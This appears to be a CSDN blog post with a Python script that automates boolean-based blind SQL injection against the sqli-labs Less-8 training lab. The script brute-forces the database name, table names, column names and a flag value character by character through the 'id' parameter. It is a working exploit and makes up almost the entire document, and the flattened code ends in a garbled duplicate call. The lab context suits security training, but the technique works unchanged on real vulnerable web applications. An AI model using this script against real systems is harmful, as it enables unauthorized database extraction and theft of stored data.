import requests import string url = "http://127.0.0.1/sqlilabs/Less-8/" def get_dbname(): db_name = '' for i in range(1, 9): # 这个遍历是数据库名字的长度如果不够的话就一点一点猜测 for j in range(32, 127): # 32~127是ascii值对应的字符 payload = "?id=1'and ascii(substr(database(),%d,1))=%d --+" % (i, j) # sql注入语句 url1 = url + payload # 获取url(原url+sql语句构造的url) res = requests.get(url1) # 获取sql注入生成后的页面 if "You are in..........." in res.text: # 因为sql语句执行成功页面会显示You are in……,所以只需判断页面显示内容有You are in……即可 db_name += chr(j) # 获取到的字符写入dn_name方便输出 print("数据库名称为:" + db_name) get_dbname() def get_table(): table1_name = '' table2_name = '' table3_name = '' table4_name = '' for i in range(5): # 因为数据库里面有多张表,所以需要再嵌套一个遍历,这个遍历所对应的是limit取值 for j in range(6): for k in range(32, 127): payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1))=%d--+" % ( i, j, k) url2 = url + payload res = requests.get(url2) if "You are in..........." in res.text: if i == 0: table1_name += chr(k) print("第一个表为:" + table1_name) elif i == 1: table2_name += chr(k) print("第二个表为:" + table2_name) elif i == 2: table3_name += chr(k) print("第三个表为:" + table3_name) elif i == 3: table4_name += chr(k) print("第四个表为:" + table4_name) else: break get_table() def get_columns(): column1 = '' column2 = '' column3 = '' for i in range(3): for k in range(1, 9): for j in range(32, 127): payload = "?id=1'and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))=%d--+" % ( i, k, j) url3 = url + payload res = requests.get(url3) if "You are in..........." in res.text: if i == 0: column1 += chr(j) print("第一个字段为->" + column1) elif i == 1: column2 += chr(j) print("第二个字段为->" + column2) elif i == 2: column3 += chr(j) print("第三个字段为->" + column3) else: break get_columns() def get_flag(): flag = '' for i in range(30): for k in range(32, 127): payload = "?id=1'and ascii(substr((select flag from flag),%d,1))=%d--+" % (i, k) url4 = url + payload res = requests.get(url4) if "You are in..........." in res.text: flag += chr(k) print("flag为->" + flag) get_flag()ag()
sql-lab less8 python脚本
最新推荐文章于 2024-07-31 16:42:46 发布
本文介绍了一个使用Python的脚本,通过SQL注入技术来探测并获取数据库名称、表名、字段名以及flag值。该脚本利用`requests`库进行GET请求,逐步猜测ASCII字符来实现对特定数据库的探索。
摘要由CSDN通过智能技术生成